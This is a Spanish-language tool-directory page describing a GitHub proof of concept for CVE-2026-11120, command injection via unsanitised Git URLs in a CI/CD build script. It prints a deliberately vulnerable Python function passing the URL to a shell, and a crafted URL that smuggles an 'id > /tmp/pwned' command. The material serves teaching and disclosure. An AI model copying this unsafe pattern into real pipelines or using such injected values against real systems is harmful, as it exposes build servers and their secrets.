Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-11120-Command-Injection-via-Git-URL-in-CI-CD-Pipeline — Demuestra la inyección de comandos a través de URLs de Git sin sanitizar en pipelines de CI/CD, incluyendo un script de compilación vulnerable y un ejemplo de exploit para un CVE crítico. | Kitploit
Herramientas/GitHubGitHub/george0papasotiriou/cve-2026-11120-command-injection-via-git-url-in-ci-cd-pipeline
Análisis de VulnerabilidadesExplotaciónDevSecOpsAprendizaje y Educación
GitHubgeorge0papasotiriou/cve-2026-11120-command-injection-via-git-url-in-ci-cd-pipeline

CVE-2026-11120-Command-Injection-via-Git-URL-in-CI-CD-Pipeline

Demuestra la inyección de comandos a través de URLs de Git sin sanitizar en pipelines de CI/CD, incluyendo un script de compilación vulnerable y un ejemplo de exploit para un CVE crítico.

Ver Repositorio
1hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-11120 – Inyección de comandos a través de la URL de Git en el pipeline de CI/CD

Código del programa (Python)

root@kitploit:~
# cicd_build.py - Clones repository without sanitizing URL
import subprocess, sys

def clone_and_build(repo_url):
    # Vulnerability: repo_url can contain shell metacharacters
    cmd = f"git clone {repo_url} /tmp/repo"
    subprocess.check_call(cmd, shell=True)
    # Build steps...

if __name__ == '__main__':
    # Simulate attacker-controlled input
    malicious_url = "https://github.com/org/repo.git; id > /tmp/pwned"
    clone_and_build(malicious_url)

CVE-2026-11120 – Inyección de comandos a través de la URL de Git en CI/CD

Severity: Critical

Resumen

Un script de pipeline de CI/CD utiliza URLs de repositorio Git proporcionadas por el usuario sin sanitizar en un comando de shell. Un atacante puede inyectar comandos de shell incluyendo caracteres especiales (p. ej., ;, &&) en la URL, lo que conduce a la ejecución arbitraria de comandos en el servidor de compilación.

Detalles de la vulnerabilidad

  • Tipo: Inyección de comandos
  • Impacto: Compromiso de la infraestructura de compilación, fuga de secretos.
  • Causa raíz: La URL del repositorio se concatena directamente en un comando de shell sin escape ni validación.

Demostración del exploit

Ejecute el script vulnerable:

root@kitploit:~
python cicd_build.py

Ejecuta el comando id inyectado, creando /tmp/pwned.

Descargar herramienta